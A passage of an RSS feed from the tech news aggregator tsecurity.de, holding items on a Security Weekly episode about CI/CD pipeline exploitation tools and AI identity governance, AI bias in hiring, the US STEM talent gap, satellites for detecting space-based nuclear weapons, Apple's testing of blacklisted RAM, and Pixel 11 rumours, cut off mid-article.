LexisNexis Risk Solutions. Visit <a rel="noopener" target="_blank" href="https://securityweekly.com/lexisnexisidv">https://securityweekly.com/lexisnexisidv</a> to learn more about them!</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/esw">https://www.securityweekly.com/esw</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/esw-467">https://securityweekly.com/esw-467</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hungry? We talk Smoked Meat, Poutine, and Bagel - also, Identiverse Interviews! - ESW #467]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 Interview with François Proulx from Boost Security

Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation

Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine....]]></description>
<link>https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664747/it-security-video/hungry-we-talk-smoked-meat-poutine-and-bagel-also-identiverse-interviews-esw-467/</guid>
<pubDate>Mon, 13 Jul 2026 11:17:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 1x - Views:2 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/ywJwPPIWDOU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Interview with François Proulx from Boost Security<br />
<br />
Software Supply Chain Security: Build Pipeline (CI/CD) Exploitation<br />
<br />
Boost Security is the creator of some very popular build pipeline security tools, like Bagel and Poutine. Today, we discuss their latest tool, Smoked Meat. They describe it as "Like Metasploit, but for CI/CD pipelines".<br />
<br />
Segment Resources:<br />
- Smoked Meat announcement: https://labs.boostsecurity.io/articles/introducing-smokedmeat<br />
- Smoked Meat github: https://github.com/boostsecurityio/smokedmeat<br />
- Smoked Meat demo: https://www.youtube.com/watch?v=F5Hr_201Au8 with Guillaume and François<br />
<br />
Dr. John Prichard from Radiant Logic<br />
<br />
The Three Identity Problem: Surviving Identity Security's Chaotic Era<br />
<br />
Identity security has entered its chaotic era. Human, non-human, and agentic AI identities no longer just coexist. They form an uncontrolled inheritance chain in which a human creates an agent, the agent spins up service principals, OAuth grants, and role assignments, and that whole chain keeps running long after the human changes roles or leaves. Most of these chains are being spawned by business users on low-code and enterprise AI platforms, outside traditional identity controls and largely invisible to security.<br />
<br />
In this segment, Radiant Logic CEO Dr. John Pritchard joins us to unpack why this is no longer a visibility problem. It is an observability problem. And it is shifting the center of gravity in identity security from authentication to authorization. Listeners will leave with a clearer view of where their current IAM, IGA, and NHI programs fall short, and a practical lens for governing the rapidly expanding population of AI agents already inside their environments.<br />
<br />
To go deeper on what John discussed today, watch Radiant Logic's on-demand webinar Identities Under Attack: How Adversaries Exploit the Human-Machine-Agent Divide at https://securityweekly.com/radiantlogicidv.<br />
<br />
Cassie Christensen from Saviynt<br />
<br />
Everyone Wants an AI Assistant. Few Are Ready to Govern One<br />
<br />
Explore a growing reality many professionals can relate to: the appeal of using AI agents to handle the work that keeps piling up - from inbox management to research and logistics - and the governance challenges that quickly follow. The real barrier to scaling personal or enterprise AI agents isn’t the technology itself, but defining clear roles, access boundaries, oversight, and lifecycle management. As organizations deploy more autonomous AI agents, the same identity frameworks used to govern workforce and non-employee identities must now evolve to manage AI-driven access before scale and risk outpace control.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Jaime Lewis-Gross from Saviynt<br />
<br />
From Sales Engineer to Forward Deployed Engineer: The Rise of Hybrid Technical Roles<br />
<br />
As technology organizations evolve, technical roles are becoming increasingly fluid - particularly at the intersection of product, engineering, and customer success. This conversation explores what it means to be a modern sales engineer and how the role is increasingly expanding into responsibilities often associated with forward deployed engineers: translating complex technical capabilities into real-world outcomes, solving customer challenges in real time, and serving as a critical bridge between product teams and end users. At the center of this evolution is a customer-first mindset - one that prioritizes listening, adaptability, and long-term partnership. As organizations race to innovate, the companies that stand out will be those that remain deeply focused on customer needs while empowering technical teams to operate beyond traditional role boundaries.<br />
<br />
This segment is sponsored by Saviynt. Learn more or get a free demo at https://securityweekly.com/saviyntidv<br />
<br />
Kim Brown from LexisNexis<br />
<br />
Stop Identity Fraud: Modern Strategies for Insurance and Healthcare<br />
<br />
Identity fraud is growing more sophisticated across both insurance and healthcare, making identity management a critical line of defense. In this executive interview, Kim Brown, VP of Product Management, will explore how organizations can strengthen identity verification, authentication, and risk assessment to reduce fraud while improving user experiences. The discussion will highlight emerging threats, evolving regulatory expectations, and practical strategies for deploying identity solutions at scale. Attendees will gain actionable insights to protect customers, patients, and their organizations without adding friction.<br />
<br />
This segment is sponsored by LexisNexis Risk Solutions. Visit https://securityweekly.com/lexisnexisidv to learn more about them!<br />
<br />
Visit https://www.securityweekly.com/esw for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/esw-467<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shall We Go On Sinning So That Grace May Increase? is hypnotic, healing, and hopeful]]></title>
<description><![CDATA[Matmos are an incredibly accomplished duo between their own solo records like the masterpiece A Chance to Cut Is a Chance to Cure and production classic Bjork records like Vespertine. But Drew Daniel, one half of Matmos, is fiendishly prolific. When he's not literally dreaming up new viral music ...]]></description>
<link>https://tsecurity.de/de/3663783/it-nachrichten/shall-we-go-on-sinning-so-that-grace-may-increase-is-hypnotic-healing-and-hopeful/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663783/it-nachrichten/shall-we-go-on-sinning-so-that-grace-may-increase-is-hypnotic-healing-and-hopeful/</guid>
<pubDate>Sun, 12 Jul 2026 21:47:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Matmos are an incredibly accomplished duo between their own solo records like the masterpiece A Chance to Cut Is a Chance to Cure and production classic Bjork records like Vespertine. But Drew Daniel, one half of Matmos, is fiendishly prolific. When he's not literally dreaming up new viral music genres, he's also putting out records […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Podcast Rewind: Surviving Email, Sony Controversies, a Snick Challenge, and John Explains the Boonies]]></title>
<description><![CDATA[Enjoy the latest episodes from MacStories’ family of podcasts: AppStories This week, Federico and John talk about the 10+ email apps they’ve used over the years and how recent spikes in email volume have caused them to change their approaches. On AppStories+, Federico and John update listeners on...]]></description>
<link>https://tsecurity.de/de/3660775/ios-mac-os/podcast-rewind-surviving-email-sony-controversies-a-snick-challenge-and-john-explains-the-boonies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3660775/ios-mac-os/podcast-rewind-surviving-email-sony-controversies-a-snick-challenge-and-john-explains-the-boonies/</guid>
<pubDate>Fri, 10 Jul 2026 22:22:52 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Enjoy the latest episodes from MacStories’ family of podcasts: AppStories This week, Federico and John talk about the 10+ email apps they’ve used over the years and how recent spikes in email volume have caused them to change their approaches. On AppStories+, Federico and John update listeners on their summertime agentic coding projects. NPC: Next […]]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s potential to infect the hiring process with bias]]></title>
<description><![CDATA[You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A survey from MyPerfectResume found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role plannin...]]></description>
<link>https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</guid>
<pubDate>Fri, 10 Jul 2026 11:32:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A <a href="https://www.myperfectresume.com/career-center/careers/basics/ai-in-hiring-layoffs" rel="nofollow">survey from MyPerfectResume</a> found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role planning.</p>



<p>On the other side, candidates are also increasingly relying on AI, with 52% of current job seekers reporting they use AI to help them in their job searches to refine submission materials (85%) and prepare for interviews (73%), according to <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">data from SAP</a>.</p>



<p>“Technology can help employers be more efficient, but hiring decisions still benefit from human judgment, especially when a candidate’s experience requires context that automated screening may not understand,” says Jasmine Escalera, career expert at online career and résumé builder Zety.</p>



<p>It’s clear AI is an integral part of the hiring process, and organizations need to prepare a strategy for what that looks like moving forward in terms of hiring bias, transparency, and striking the right balance of human effort and AI assistance.</p>



<h2 class="wp-block-heading">Recognizing the warning signs</h2>



<p>AI has the promise of bringing efficiency in hiring for both job seekers and employees, but if organizations aren’t careful, an overreliance on AI technology can lead to unintended consequences. Further MyPerfectResume data also reveals 65% of respondents say AI often automatically rejects applicants before a person sees them, and 14% say AI rejects more than half of applicants outright.</p>



<p>Additionally, 47% say they feel AI has filtered out candidates who would’ve otherwise advanced in the process. And 51% say they use AI to flag risky candidates, such as people who might be viewed as job-hoppers or who have employment gaps.</p>



<p>Flagging risky candidates and eliminating them before a human can look at their résumé can filter out candidates with experience that tells a more complex story than an algorithm is designed to interpret, says Escalera. Candidates re-entering the workforce after time off, for example, may have valuable skills that don’t fit neatly into automated screening criteria, she adds.</p>



<p>Similarly, there’s concern AI will reject a professional who wants to change industries, or has qualifications that don’t  perfectly reflect the language in a job description before a human has a chance to look.</p>



<p>Laurie Cure, CEO of consulting firm Innovative Connections, says she’s seen instances where AI has eliminated highly qualified yet nervous candidates who take more time than what the AI allocated to answer a question, or candidates may simply use a different language than the AI is programmed to look for, causing them to not be recommended to progress in the process.</p>



<p>She’s also seen where AI might use historical data to determine patterns of a successful employee, identifying certain schools, work histories, tenure, or other characteristics that, while not inherently bias, perpetuates the bias that accurate correlations exist between these elements, when they often don’t. Organizations need to ensure that humans remain a part of these processes, Cure adds, where they can bring context, intuition, nuance, and an ability to identify potential in a candidate that AI can’t replicate.</p>



<p>“I think we’re allowing AI to become the process instead of allowing it to support the process in ways that makes hiring better,” she says.</p>



<h2 class="wp-block-heading">An emphasis on accuracy over speed</h2>



<p>Cure says a major problem for most companies is that the balance is off, with companies using AI for the majority, if not all, of résumé screening rather than as a complement to human efforts. Organizations that simply implement AI to speed up different parts of the hiring process, without taking time to consider if a process stands to benefit from AI, run the risk of introducing bias.</p>



<p>“While this allows for managing high volumes of applicants, and provides greater degrees of consistency in applying job criteria, it likely misses many good candidates,” she says. “The human element needs to be highly active in developing job requirements so they’re not too narrow. Organizations need to look at how they ask AI to do its work, so be cautious how you frame the screening or other criteria.”</p>



<p>Ultimately, AI isn’t a tool to be implemented and forgotten, or one that should be viewed simply as a path to efficiency since many processes still benefit from and require a human touch. It’s important to conduct audits of AI processes in hiring, and to remember that the use of AI doesn’t eliminate the legal or ethical obligations an organization has for equal employment, says Cure, making the balance between human and AI even more important.</p>



<h2 class="wp-block-heading">AI transparency and fostering candidate trust</h2>



<p>AI has also introduced an element of mistrust into hiring on both sides, where employers can’t be sure candidates haven’t relied on AI the same way candidates aren’t always sure exactly how AI is being used in the hiring process. Candidates are aware that employers are implementing AI, but they’re often unsure of the extent it’s being used and when to expect to interact with humans.</p>



<p>“That lack of clarity can create skepticism and frustration, particularly in a job market that already feels highly competitive,” says Escalera. “The goal shouldn’t be to convince candidates that AI isn’t being used, but to help them understand how technology supports decisions rather than replaces the human judgment behind them.”     </p>



<p>Cure recommends organizations start with a process map that outlines every step of an organization’s hiring process to help visualize where AI is beneficial and which processes still require human intervention. Companies can shift to relying too heavily on AI or they may become too dependent on human effort, when that effort could be put toward more important tasks.</p>



<p>“Humans bring an understanding of a person’s broader history, and the ability to detect when a candidate has potential to grow into the role,” she says. “People can see non-traditional career paths and motivations more distinctly than AI. Yet AI brings consistency, efficiency, criteria standardization, and a level of objectivity the process benefits from. If we effectively blend these two at the right points in the process, hiring is enhanced, not diminished.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why the US is at risk of losing the AI talent and productivity war]]></title>
<description><![CDATA[The hardest thing to manage is change. I wrote that line more than a decade ago in an article about the “XPocalypse,” Microsoft’s end-of-life deadline for Windows XP. My argument then was that the real crisis was not obsolete software. It was the shortage of technically literate professionals cap...]]></description>
<link>https://tsecurity.de/de/3656445/it-security-nachrichten/why-the-us-is-at-risk-of-losing-the-ai-talent-and-productivity-war/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656445/it-security-nachrichten/why-the-us-is-at-risk-of-losing-the-ai-talent-and-productivity-war/</guid>
<pubDate>Thu, 09 Jul 2026 11:08:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The hardest thing to manage is change. <a href="https://www.forbes.com/sites/ciocentral/2014/05/06/the-role-of-stem-education-in-shaping-the-future-of-information-security/" rel="nofollow">I wrote that line more than a decade ago in an article about the “XPocalypse,”</a> Microsoft’s end-of-life deadline for Windows XP. My argument then was that the real crisis was not obsolete software. It was the shortage of technically literate professionals capable of guiding organizations through inevitable transitions.</p>



<p>More than a decade later, the names have changed. The lesson has not.</p>



<p>Y2K defined the pattern. The risk was real, but disaster was avoided because skilled people did the work. When nothing happened at midnight (1999-2000), many assumed the threat had been exaggerated instead of recognizing that it had been managed. Windows XP became the next version of the same problem. The operating system stayed embedded in retail, banking, healthcare, energy, law enforcement and defense systems long after it should have been retired. The vulnerability was real, but the larger lesson was mostly missed: organizations let technical debt pile up until a deadline turns it into a crisis.</p>



<h2 class="wp-block-heading">Is agentic AI actually breaking the enterprise SaaS business model?</h2>



<p>Now we have the “<a href="https://www.cio.com/article/4166654/why-the-saaspocalypse-story-youre-hearing-is-missing-the-most-dangerous-part.html">SaaSpocalypse</a>.” Headlines warn that agentic AI is breaking the SaaS business model, lowering software valuations and making entire categories of enterprise tools obsolete. Investors are reacting; analysts are talking about “FOBO,” Fear of Becoming Obsolete, and organizations are again asking whether they are ready for what comes next.</p>



<p>The disruption is real. AI agents can now automate workflows that once required dedicated software tools and teams of human operators. The per-seat pricing model that powered two decades of SaaS economics is under pressure. But the apocalyptic framing misdiagnoses the problem. SaaS is not dying. It is bifurcating.</p>



<p>Platforms requiring precision, auditability, complex state management and regulatory accountability, such as financial systems, healthcare records and compliance infrastructure, will remain essential. What is collapsing is the undifferentiated middle: horizontal tools that AI agents can replicate cheaply and at scale.</p>



<p>The organizations most exposed are not simply those using the wrong software. They are those who outsourced technical judgment along with technical execution. They bought SaaS as a substitute for internal capability, accumulated organizational debt and now lack the human capital to navigate a transition that is fundamentally about people and process.</p>



<p>The old taxonomy still applies: people, process and technology. Technology serves business functions. Processes create efficiency. Qualified people sustain both. But the <a href="https://www.harveynash.co.uk/latest-news/digital-leadership-report-2025" rel="nofollow">pace of technological change</a> continues to outrun the education system’s ability to produce experienced professionals with current skills.</p>



<p><a href="https://www.cio.com/video/4033057/is-the-ai-skills-shortage-a-threat-to-it-leaders-what-it-leaders-want-ep-10.html">AI has widened that gap</a>. Data engineers now design orchestration infrastructure that determines whether AI produces value or liability. Security practitioners must govern autonomous agents acting on behalf of enterprises. Business leaders need enough technical fluency to make build-versus-buy decisions in a market changing in real time.</p>



<p>These are not narrow technical tasks. They are the applied outputs of serious STEM education grounded in a business context, professional standards and sustained practice. We are still not producing enough people who have those skills.</p>



<h2 class="wp-block-heading">How is the growing STEM education gap threatening AI leadership?</h2>



<p>The numbers are sobering. The United States now produces fewer than 820,000 STEM graduates annually, representing about 20% of all degrees awarded. China produces approximately 3.57 million STEM graduates each year, about 40% of its university degrees. At the doctoral level, the gap is sharper. In 2000, the United States awarded 17,830 STEM PhDs, compared with China’s 7,520. By 2022, China awarded more than 50,970 STEM doctorates, over 50% more than the 33,820 awarded in the United States.</p>



<p>This matters directly to AI leadership. Countries building the strongest STEM pipelines today are positioning themselves to define the architecture, governance and standards of AI systems tomorrow.</p>



<h2 class="wp-block-heading">How can we solve the AI talent shortage and rebuild the IT profession?</h2>



<p>More than a decade ago, I argued that IT must be treated as a profession, not merely a resource. Finance, medicine, law, engineering and accounting all have formal professional pathways, standards and institutional support. Information technology underpins nearly every critical function of modern society, yet still lacks equivalent professional frameworks.</p>



<p>The AI transition makes this more urgent. As AI absorbs routine execution, the humans left in the loop must be more capable, not fewer. Their role is shifting from implementation to governance, from configuration to architecture, from maintenance to judgment. That requires better preparation, stronger incentives and professional recognition.</p>



<p>The United States still leads in private AI investment, but it has not matched that commitment with investment in the human capital needed to sustain it. China has embedded AI degree programs across more than 500 universities and integrated corporations directly into research and workforce pipelines. India’s AI upskilling surge is driven heavily by corporate sponsorship, with employers treating workforce education as strategic investment. The European Union has committed significant public funding to AI talent development and cross-border STEM mobility.</p>



<p>The United States has examples worth scaling. North Carolina’s AI Academy at NC State, built with more than 100 corporate partners, combines university credentialing with applied workplace training. North Carolina A&amp;T, the nation’s leading producer of Black engineers, is partnering with NVIDIA and the Office of Naval Research to expand AI and cybersecurity talent. Texas has committed heavily to doctoral research infrastructure through the Texas Institute for Electronics, linking universities, government and industry around semiconductor and defense technology priorities.</p>



<p>These models show what a national strategy should look like: public investment, corporate sponsorship, university research capacity and continuous pathways from undergraduate study through doctoral work. But they remain exceptions. Corporate PhD fellowships from leading technology companies are valuable, but they are filters, not pipelines.</p>



<p>The technology sector has long harvested talent from a pipeline it does not adequately fund, then wondered <a href="https://www.manpowergroup.com/en/insights/2026-global-talent-shortage" rel="nofollow">why the pipeline runs short.</a> That model is no longer sustainable. Federal and state governments must create the policy environment, including tax incentives, credentialing reform, research funding and visa frameworks, that makes corporate STEM investment structurally attractive rather than reputationally optional.</p>



<p>The SaaSpocalypse will pass, as Y2K and the XPocalypse passed, because capable people will do the work. The headlines will move on. The underlying shortage will remain.</p>



<p>What I called for in 2014 still stands: STEM education, paired with business, information management and finance, must become a sustained national infrastructure. Not as a reaction to this disruption, but as preparation for the next one.</p>



<p>The hardest thing to manage is change. The next is learning from it.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shoebox-Sized 'Detector Satellites' Could Sniff Out a Nuclear Bomb In Space]]></title>
<description><![CDATA[A new study proposes using shoebox-sized detector satellites to sniff out nuclear weapons launched by adversary nations. The idea is aimed at addressing fears that a space-based nuclear detonation could destroy satellites across low Earth orbit and make some orbits unusable for years. Space.com s...]]></description>
<link>https://tsecurity.de/de/3656205/it-security-nachrichten/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656205/it-security-nachrichten/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space/</guid>
<pubDate>Thu, 09 Jul 2026 09:08:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new study proposes using shoebox-sized detector satellites to sniff out nuclear weapons launched by adversary nations. The idea is aimed at addressing fears that a space-based nuclear detonation could destroy satellites across low Earth orbit and make some orbits unusable for years. Space.com shares the findings from a new paper authored by Areg Danagoulian, an associate professor of nuclear science and engineering at the Massachusetts Institute of Technology: No reliable way currently exists to detect and defuse a nuclear bomb in space. Danagoulian proposes a constellation of small "9U" cubesats, each one about the size of a large shoebox and each carrying a special detector capable of sensing radiation emitted by unexploded nuclear bombs. He explores a scenario in which Russia launches a suspected space nuke into an orbit with an altitude of 1,200 miles (2,000 km). That number is not random. In 2022, Russia's Kosmos 2553 satellite, orbiting at that exact altitude, triggered suspicions it might be testing components for a future orbital nuclear weapon.
 
Russia claims the satellite just observes Earth. At that altitude, the satellite passes through the Van Allen belt, a region of intense cosmic radiation trapped by Earth's magnetic field. Most of the belt stretches between altitudes of around 600 miles (1,000 km) to tens of thousands of miles, but in some areas the radiation can reach much closer to Earth's surface. The interaction between the fissile material inside the nuke and the energetic particles from the radiation belt would create distinct signatures, Danagoulian said, which could help confirm whether a suspicious satellite carries a nuke or not.
 
"The thermonuclear weapon would contain a significant amount of uranium," Danagoulian said. "The high-energy protons [in the uranium] would break up when another proton is coming in and shred the nuclei. That would knock out a large number of neutrons. This interaction turns that device into a very intense neutron source that otherwise would not be there." he process is known as proton-induced neutron spallation, which essentially means the ejection of fragments from material triggered by impacts of protons. The detector satellite Danagoulian proposes would have to be able to get quite close to the suspect spacecraft -- a few kilometers.
 
The inspector spacecraft would carry a sensor combining two types of detectors. At the heart of the device is a neutron scintillator, which detects all incoming neutrons and protons. Around it is a "cage of diamond" detector that detects only neutrons -- not protons. Such a set-up helps filter out the particles present in the environment naturally, said Danagoulian. In addition, by using two "planes of neutron detectors," the sensor can determine the direction from which the neutrons arrived. "If the external diamond detector triggers and gives a signal, you can ignore the particle, because it's most likely a proton and not a neutron," said Danagoulian. "Once you identify those neutrons, by having those two detections, you can back project and find out where the neutron came from."
 
Danagoulian says such a nuke sniffer would have to be launched into an orbit aligned with that of the suspicious satellite and creep up as close as 2.5 miles (4 km) from it. It would then take about a week to gather enough measurements to confirm whether the object is hiding a nuke or not. A constellation of 10 such satellites could reduce the process to mere hours, Danagoulian said. If a nuke were detected, the military could then try to jam the satellite's communications link from the ground, making it impossible for the adversary to remotely detonate the bomb. There is currently no technology available to safely defuse a nuclear weapon in space. [...] Danagoulian also suggests that high-grade radiation hardening could improve satellites' chances of surviving a nuclear winter in space. The paper has been published in the journal Nature.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Shoebox-Sized+'Detector+Satellites'+Could+Sniff+Out+a+Nuclear+Bomb+In+Space%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F09%2F0427237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F07%2F09%2F0427237%2Fshoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/07/09/0427237/shoebox-sized-detector-satellites-could-sniff-out-a-nuclear-bomb-in-space?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple testing banned vendor RAM is a Band-Aid, not a cure]]></title>
<description><![CDATA[Apple's testing of memory chips from CXMT, a supplier black-listed by the U.S. government, could help ease the RAM pricing crisis. It's nowhere near enough to solve the problem.A Samsung LPDDR5X memory chip - Image Credit: SamsungIn late June, Apple reportedly asked the Trump administration to al...]]></description>
<link>https://tsecurity.de/de/3655009/ios-mac-os/apple-testing-banned-vendor-ram-is-a-band-aid-not-a-cure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3655009/ios-mac-os/apple-testing-banned-vendor-ram-is-a-band-aid-not-a-cure/</guid>
<pubDate>Wed, 08 Jul 2026 19:25:39 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's testing of memory chips from CXMT, a supplier black-listed by the U.S. government, could help ease the RAM pricing crisis. It's nowhere near enough to solve the problem.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68199-143774-68090-143531-67518-142181-66507-139493-66157-138669-samsungthinmemory-xl-xl-xl-xl-xl.jpg" alt="A fingertip carefully balancing an ultra thin computer microchip, highlighting its tiny pins and delicate, compact design against a soft, bright background" height="738"><br><span>A Samsung LPDDR5X memory chip - Image Credit: Samsung</span></div><br>In late June, Apple <a href="https://appleinsider.com/articles/26/06/27/apple-asks-trump-to-let-it-buy-memory-from-a-blacklisted-supplier">reportedly asked</a> the Trump administration to allow it to buy RAM chips from a supplier in China that the U.S. had blacklisted. As Cupertino waits on Washington, it is allegedly testing out the memory from the blackballed company.<br><br>According to <a href="https://www.ft.com/content/f4ac5c92-03be-4499-b16a-017a7e9ee228?syn-25a6b1a6=1">two sources</a> cited by the <em>Financial Times</em>, Apple has started to test DRAM chips produced by CXMT (ChangXin Memory Technologies). Apple has acquired memory chips intended for use in smartphones and devices sold in China.<br><br><br> <a href="https://appleinsider.com/articles/26/07/08/apple-testing-banned-vendor-ram-is-a-band-aid-not-a-cure?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244907?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Pixel 11: Die wichtigsten Leaks und Gerüchte]]></title>
<description><![CDATA[Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten iPhone-17-Modellen von Apple, umfasst die Pixel-10-Re...]]></description>
<link>https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654494/it-nachrichten/google-pixel-11-die-wichtigsten-leaks-und-geruechte/</guid>
<pubDate>Wed, 08 Jul 2026 15:47:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Das Pixel 11 gehört zweifellos zu den am meisten erwarteten Android-Smartphones des Jahres 2026 – und das aus gutem Grund. Auch wenn man argumentieren könnte, dass es sich nicht um eine so umfassende Neugestaltung handelte wie bei den jüngsten <a href="https://www.macwelt.de/article/2915599/test-iphone-17.html" target="_blank" rel="noreferrer noopener">iPhone-17-Modellen von Apple</a>, umfasst die <a href="https://www.pcwelt.de/article/2921090/google-pixel-10-test.html" target="_blank" rel="noreferrer noopener">Pixel-10-Reihe</a> dennoch eine Reihe herausragender Geräte, die viele gerne als ihr Alltagsgerät nutzen.</p>



<p>Der verbesserte Tensor-G5-Chipsatz ermöglichte es, dass mehr von Googles hauseigenen KI-Funktionen in die integrierte Software Einzug hielten. Die Einführung von Pixelsnap bedeutete, dass Android-Fans, die schon lange neidisch auf Apples Magsafe-Technologie waren, endlich alle Vorteile genießen konnten, die eine Qi2-Magnetverbindung mit sich bringt.</p>



<p>Diese Verbesserungen ergänzen die üblichen Vorzüge, die wir an Pixel-Smartphones schätzen – nämlich die Art und Weise, wie ihre Kameras Hauttöne in Bildern präzise wiedergeben, sowie die wunderbar übersichtliche Gestaltung von Stock-Android. Genau aus diesem Grund finden sich Pixel-Smartphones regelmäßig in unseren Übersichten zu den <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">besten Smartphones</a> wieder.</p>



<p>Vor diesem Hintergrund sind wir gespannt, in welche Richtung Google mit der Pixel-11-Reihe als Nächstes gehen wird – insbesondere da sich der Wettbewerb durch aktuelle Android-Spitzenmodelle wie das <a href="https://www.pcwelt.de/article/2972780/oneplus-15-test-handy-flaggschiff.html" target="_blank" rel="noreferrer noopener">OnePlus 15</a> und das <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Honor Magic 8 Pro</a> weiter verschärft, ganz zu schweigen vom <a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html">Oppo Fin</a><a href="https://www.pcwelt.de/article/2967222/oppo-find-x9-pro-test.html" target="_blank" rel="noreferrer noopener">d</a><a href="https://www.techadvisor.com/article/2950432/oppo-find-x9-pro-review.html"> X9 Pro</a>, das in Sachen Smartphone-Fotografie ein absolutes Kraftpaket ist.</p>



<h2 class="wp-block-heading">Neueste Gerüchte zum Pixel 11</h2>



<p>Alle Pixel-11-Modelle könnten eine umfassende Kameraüberarbeitung erfahren: Sowohl das Pixel 11 als auch das 11 Pro Fold sollen mit einem neuen 50-Megapixel-Hauptobjektiv ausgestattet werden, während das Pixel 11 Pro und das 11 Pro XL komplett neue Haupt- und Teleobjektive erhalten werden. Nachdem Gerüchte über eine Face-ID-Alternative <a href="https://www.androidauthority.com/google-pixel-11-face-unlock-3494465/" target="_blank" rel="noreferrer noopener">kursierten</a>, scheint es nun so, als würde diese Funktion auf die Modelle des nächsten Jahres verschoben werden.</p>



<h2 class="wp-block-heading toc">Wann wird das Google Pixel 11 erscheinen?</h2>



